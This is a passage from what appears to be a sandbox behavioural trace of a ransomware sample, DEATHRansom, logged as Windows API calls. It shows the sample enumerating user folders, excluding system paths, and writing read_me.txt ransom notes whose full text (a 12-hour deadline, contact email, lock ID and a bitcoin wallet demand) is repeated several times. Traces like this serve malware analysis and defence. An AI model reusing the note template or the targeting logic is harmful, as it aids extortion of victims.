cAlternateFileName="")) returned 1 [0073.892] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\desktop.ini") returned 54 [0073.892] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x496, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lulcit amkdfe.contact", cAlternateFileName="LULCIT~1.CON")) returned 1 [0073.892] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\lulcit amkdfe.contact") returned 64 [0073.892] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 1 [0073.892] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\sikvnb huvuib.contact") returned 64 [0073.892] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sikvnb huvuib.contact", cAlternateFileName="SIKVNB~1.CON")) returned 0 [0073.892] FindClose (in: hFindFile=0x2b25f8 | out: hFindFile=0x2b25f8) returned 1 [0073.892] wnsprintfW (in: pszDest=0x8a800a0, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt") returned 54 [0073.892] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Contacts\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\contacts\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.892] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.892] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.893] CloseHandle (hObject=0x780) returned 1 [0073.894] GetProcessHeap () returned 0x280000 [0073.894] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8a800a0 | out: hHeap=0x280000) returned 1 [0073.894] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x2416, ftCreationTime.dwLowDateTime=0x29103b60, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0x29103b60, ftLastAccessTime.dwHighDateTime=0x1d2dd9c, ftLastWriteTime.dwLowDateTime=0x29103b60, ftLastWriteTime.dwHighDateTime=0x1d2dd9c, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Cookies", cAlternateFileName="")) returned 1 [0073.894] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned 41 [0073.894] lstrcmpW (lpString1="Cookies", lpString2="..") returned 1 [0073.894] lstrcmpW (lpString1="Cookies", lpString2=".") returned 1 [0073.894] StrStrW (lpFirst="cookies", lpSrch="programdata") returned 0x0 [0073.894] StrStrW (lpFirst="cookies", lpSrch="$recycle.bin") returned 0x0 [0073.894] StrStrW (lpFirst="cookies", lpSrch="program files") returned 0x0 [0073.894] StrStrW (lpFirst="cookies", lpSrch="windows") returned 0x0 [0073.894] StrStrW (lpFirst="cookies", lpSrch="all users") returned 0x0 [0073.894] StrStrW (lpFirst="cookies", lpSrch="appdata") returned 0x0 [0073.894] GetProcessHeap () returned 0x280000 [0073.894] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8a800a0 [0073.894] lstrcpyW (in: lpString1=0x8a800a0, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies" [0073.894] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 38 [0073.894] QueueUserWorkItem (Function=0x40a710, Context=0x8a800a0, Flags=0x0) returned 1 [0073.894] GetProcessHeap () returned 0x280000 [0073.894] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b20008 [0073.896] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*") returned 43 [0073.896] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x2eaf1340, ftCreationTime.dwHighDateTime=0x1d2fad7, ftLastAccessTime.dwLowDateTime=0x2eaf1340, ftLastAccessTime.dwHighDateTime=0x1d2fad7, ftLastWriteTime.dwLowDateTime=0x2eaf1340, ftLastWriteTime.dwHighDateTime=0x1d2fad7, nFileSizeHigh=0x0, nFileSizeLow=0x494, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="sikvnb huvuib.contact", cAlternateFileName="廠疙ᣜ?\x17甴\x17a")) returned 0xffffffff [0073.896] wnsprintfW (in: pszDest=0x8b20008, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\read_me.txt") returned 53 [0073.896] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Cookies\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\cookies\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x780 [0073.897] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our e-mail: deathransom@airmail.cc\r\n \r\n \r\nIn your message you have to write:\r\n1. YOU LOCK-ID: FsmNhAy4eIOOBDXgBv5h1h0NjW1pfvs4Qw9L5JFqGSYFihQ4iJwFhKTfRyFmTwYO9F91//SefN1DPc9oMhDm7VKMrrXPjjFNjADyqjEQ0qLJuI6uvStwZTTTRShddGswxn2v5gxGXZFeEBOMd6jUGZeo6+Qh0/m/bGF7YcQJjxqS9pM5P219wZIpQl8rN99+5DfJOVchV0WLfrkuCyh42gd4sWXxvB2M8Gp34SV0WneKIJ4t08PHJPRvXLtxyLHGbefe44gdY4Enq+NHDY3+Bx1MCqkVHsiVlEkruc/mytRv4IYracirEYEv9LI/oTvz07Ki+8jwYJrS0YwALmT8GCutTysmDYRGnXymIcOXzNpZxjkhx+6DzC1naSxpJy1cYFS2qkL6bpiYKwZIK6IPUBvB++G7kh6L69B3dmPin6adcHxNbZJPrpRN/Jfmk+6WYS6r7DhOAb+tdz5f6pX+fDV4gpQtkcnu8ZRUmS+isi7EJTzBaQeSNiWKcGNuPpZQ+QAiamcL07qjO/j+lxw6r1R7+nVY2Osk2kC0eVEEMG+ADm5xHZil/71fjH+o2phwmleCShm2/hvMnJeVEnaAqMdV0OwbL8wzqx1nkJhbkvZPKV/V2TOm0IAGLIDV4oEMFnphvkSIlubJsksnQnDr6quNLWhInMcQciy/qOItMAgW96GknvBf0FzviZFj59LaiyI80q05f4OpmuSD7HlcIA==\r\n2. Time when you have paid 0.1 btc to this bitcoin wallet:\r\n1J9CG9KtJZVx1dHsVcSu8cxMTbLsqeXM5N\r\n \r\n \r\nAfter payment our team will decrypt your files immediatly\r\n \r\n \r\nFree decryption as guarantee:\r\n1. File must be less than 1MB\r\n2. Only .txt or .lnk files, no databases\r\n3. Only 1 files\r\n \r\n \r\nHow to obtain bitcoin:\r\nThe easiest way to buy bitcoins is LocalBitcoins site. You have to register, click 'Buy bitcoins', and select the seller by payment method and price.\r\nhttps://localbitcoins.com/buy_bitcoins\r\nAlso you can find other places to buy Bitcoins and beginners guide here:\r\nhttp://www.coindesk.com/information/how-can-i-buy-bitcoins/") returned 1715 [0073.897] WriteFile (in: hFile=0x780, lpBuffer=0x7d5ce20*, nNumberOfBytesToWrite=0x6b3, lpNumberOfBytesWritten=0x17e0e4, lpOverlapped=0x0 | out: lpBuffer=0x7d5ce20*, lpNumberOfBytesWritten=0x17e0e4*=0x6b3, lpOverlapped=0x0) returned 1 [0073.898] CloseHandle (hObject=0x780) returned 1 [0073.898] GetProcessHeap () returned 0x280000 [0073.898] HeapFree (in: hHeap=0x280000, dwFlags=0x0, lpMem=0x8b20008 | out: hHeap=0x280000) returned 1 [0073.898] FindNextFileW (in: hFindFile=0x2b2678, lpFindFileData=0x17e0f8 | out: lpFindFileData=0x17e0f8*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf9474730, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf9474730, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xa0000003, dwReserved1=0x2e0000, cFileName="Desktop", cAlternateFileName="")) returned 1 [0073.898] wnsprintfW (in: pszDest=0x8bb0138, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned 41 [0073.898] lstrcmpW (lpString1="Desktop", lpString2="..") returned 1 [0073.898] lstrcmpW (lpString1="Desktop", lpString2=".") returned 1 [0073.898] StrStrW (lpFirst="desktop", lpSrch="programdata") returned 0x0 [0073.899] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b20008 [0073.899] lstrcpyW (in: lpString1=0x8b20008, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop" [0073.899] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 39 [0073.899] QueueUserWorkItem (Function=0x40a710, Context=0x8b20008, Flags=0x0) returned 1 [0073.899] GetProcessHeap () returned 0x280000 [0073.899] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b30010 [0073.900] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*") returned 43 [0073.900] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\*", lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf9474730, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf9474730, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b25f8 [0073.900] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\.") returned 43 [0073.900] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.900] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.900] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x28cff640, ftCreationTime.dwHighDateTime=0x1d2dd9c, ftLastAccessTime.dwLowDateTime=0xf9474730, ftLastAccessTime.dwHighDateTime=0x1d59ffd, ftLastWriteTime.dwLowDateTime=0xf9474730, ftLastWriteTime.dwHighDateTime=0x1d59ffd, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.900] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\..") returned 44 [0073.900] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.900] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x78d85570, ftCreationTime.dwHighDateTime=0x1d4ced0, ftLastAccessTime.dwLowDateTime=0xaaabbc90, ftLastAccessTime.dwHighDateTime=0x1d4c908, ftLastWriteTime.dwLowDateTime=0xaaabbc90, ftLastWriteTime.dwHighDateTime=0x1d4c908, nFileSizeHigh=0x0, nFileSizeLow=0x369a, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="4HKKgFKeIA-tj8p.mkv", cAlternateFileName="4HKKGF~1.MKV")) returned 1 [0073.900] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\4HKKgFKeIA-tj8p.mkv") returned 61 [0073.900] FindNextFileW (in: hFindFile=0x2b25f8, lpFindFileData=0x17de80 | out: lpFindFileData=0x17de80*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7d09340, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x24d43c90, ftLastAccessTime.dwHighDateTime=0x1d4cd00, ftLastWriteTime.dwLowDateTime=0x24d43c90, ftLastWriteTime.dwHighDateTime=0x1d4cd00, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="9-1Wl49_LbKQ0", cAlternateFileName="9-1WL4~1")) returned 1 [0073.900] wnsprintfW (in: pszDest=0x8b30010, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0") returned 55 [0073.900] lstrcmpW (lpString1="9-1Wl49_LbKQ0", lpString2="..") returned 1 [0073.900] lstrcmpW (lpString1="9-1Wl49_LbKQ0", lpString2=".") returned 1 [0073.900] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b40018 [0073.901] lstrcpyW (in: lpString1=0x8b40018, lpString2="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0" | out: lpString1="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0") returned="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0" [0073.901] InterlockedExchangeAdd (in: Addend=0x40f170, Value=1 | out: Addend=0x40f170) returned 40 [0073.901] QueueUserWorkItem (Function=0x40a710, Context=0x8b40018, Flags=0x0) returned 1 [0073.901] GetProcessHeap () returned 0x280000 [0073.901] RtlAllocateHeap (HeapHandle=0x280000, Flags=0x8, Size=0xfffe) returned 0x8b50020 [0073.901] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\*") returned 57 [0073.902] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\*", lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7d09340, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x24d43c90, ftLastAccessTime.dwHighDateTime=0x1d4cd00, ftLastWriteTime.dwLowDateTime=0x24d43c90, ftLastWriteTime.dwHighDateTime=0x1d4cd00, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName=".", cAlternateFileName="")) returned 0x2b26b8 [0073.902] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\.") returned 57 [0073.902] lstrcmpW (lpString1=".", lpString2="..") returned -1 [0073.902] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0073.902] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xc7d09340, ftCreationTime.dwHighDateTime=0x1d4cb7e, ftLastAccessTime.dwLowDateTime=0x24d43c90, ftLastAccessTime.dwHighDateTime=0x1d4cd00, ftLastWriteTime.dwLowDateTime=0x24d43c90, ftLastWriteTime.dwHighDateTime=0x1d4cd00, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="..", cAlternateFileName="")) returned 1 [0073.902] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\..") returned 58 [0073.902] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0073.902] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1f93d3c0, ftCreationTime.dwHighDateTime=0x1d4d562, ftLastAccessTime.dwLowDateTime=0xa0e7cfe0, ftLastAccessTime.dwHighDateTime=0x1d4d309, ftLastWriteTime.dwLowDateTime=0xa0e7cfe0, ftLastWriteTime.dwHighDateTime=0x1d4d309, nFileSizeHigh=0x0, nFileSizeLow=0x10ff, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="2OrJ.png", cAlternateFileName="")) returned 1 [0073.902] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\2OrJ.png") returned 64 [0073.902] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfc028a60, ftCreationTime.dwHighDateTime=0x1d4c5e3, ftLastAccessTime.dwLowDateTime=0xe21c5ca0, ftLastAccessTime.dwHighDateTime=0x1d4c78e, ftLastWriteTime.dwLowDateTime=0xe21c5ca0, ftLastWriteTime.dwHighDateTime=0x1d4c78e, nFileSizeHigh=0x0, nFileSizeLow=0x17cdb, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="L6g9L.gif", cAlternateFileName="")) returned 1 [0073.902] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\L6g9L.gif") returned 65 [0073.902] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x8da28b00, ftCreationTime.dwHighDateTime=0x1d4c620, ftLastAccessTime.dwLowDateTime=0x20a05080, ftLastAccessTime.dwHighDateTime=0x1d4d44b, ftLastWriteTime.dwLowDateTime=0x20a05080, ftLastWriteTime.dwHighDateTime=0x1d4d44b, nFileSizeHigh=0x0, nFileSizeLow=0xda20, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="lBtV.mp3", cAlternateFileName="")) returned 1 [0073.902] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\lBtV.mp3") returned 64 [0073.902] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x19a89350, ftCreationTime.dwHighDateTime=0x1d4c77b, ftLastAccessTime.dwLowDateTime=0x3b3259b0, ftLastAccessTime.dwHighDateTime=0x1d4c52e, ftLastWriteTime.dwLowDateTime=0x3b3259b0, ftLastWriteTime.dwHighDateTime=0x1d4c52e, nFileSizeHigh=0x0, nFileSizeLow=0x14888, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="LW81G3U7cBxqDv1Xd1fu.odp", cAlternateFileName="LW81G3~1.ODP")) returned 1 [0073.902] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\LW81G3U7cBxqDv1Xd1fu.odp") returned 80 [0073.902] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x4590ca40, ftCreationTime.dwHighDateTime=0x1d4cfc9, ftLastAccessTime.dwLowDateTime=0x822c310, ftLastAccessTime.dwHighDateTime=0x1d4d28b, ftLastWriteTime.dwLowDateTime=0x822c310, ftLastWriteTime.dwHighDateTime=0x1d4d28b, nFileSizeHigh=0x0, nFileSizeLow=0x16de1, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="NevD8gFNlpGC369Gy.xlsx", cAlternateFileName="NEVD8G~1.XLS")) returned 1 [0073.903] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\NevD8gFNlpGC369Gy.xlsx") returned 78 [0073.903] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1335d0, ftCreationTime.dwHighDateTime=0x1d4c5c3, ftLastAccessTime.dwLowDateTime=0x3ff13ad0, ftLastAccessTime.dwHighDateTime=0x1d4d072, ftLastWriteTime.dwLowDateTime=0x3ff13ad0, ftLastWriteTime.dwHighDateTime=0x1d4d072, nFileSizeHigh=0x0, nFileSizeLow=0x143cc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uA2bXdGeAs3ZzHWmPNMy.mp3", cAlternateFileName="UA2BXD~1.MP3")) returned 1 [0073.903] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\uA2bXdGeAs3ZzHWmPNMy.mp3") returned 80 [0073.903] FindNextFileW (in: hFindFile=0x2b26b8, lpFindFileData=0x17dc08 | out: lpFindFileData=0x17dc08*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x5a1335d0, ftCreationTime.dwHighDateTime=0x1d4c5c3, ftLastAccessTime.dwLowDateTime=0x3ff13ad0, ftLastAccessTime.dwHighDateTime=0x1d4d072, ftLastWriteTime.dwLowDateTime=0x3ff13ad0, ftLastWriteTime.dwHighDateTime=0x1d4d072, nFileSizeHigh=0x0, nFileSizeLow=0x143cc, dwReserved0=0x0, dwReserved1=0x2e0000, cFileName="uA2bXdGeAs3ZzHWmPNMy.mp3", cAlternateFileName="UA2BXD~1.MP3")) returned 0 [0073.903] FindClose (in: hFindFile=0x2b26b8 | out: hFindFile=0x2b26b8) returned 1 [0073.903] wnsprintfW (in: pszDest=0x8b50020, cchDest=32767, pszFmt="%s\\read_me.txt" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\read_me.txt") returned 67 [0073.903] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-1Wl49_LbKQ0\\read_me.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-1wl49_lbkq0\\read_me.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x7ac [0073.904] lstrlenA (lpString="?????????????????????????\r\n??????DEATHRansom ???????\r\n?????????????????????????\r\nHello dear friend,\r\nYour files were encrypted!\r\nYou have only 12 hours to decrypt it\r\nIn case of no answer our team will delete your decryption password\r\nWrite back to our 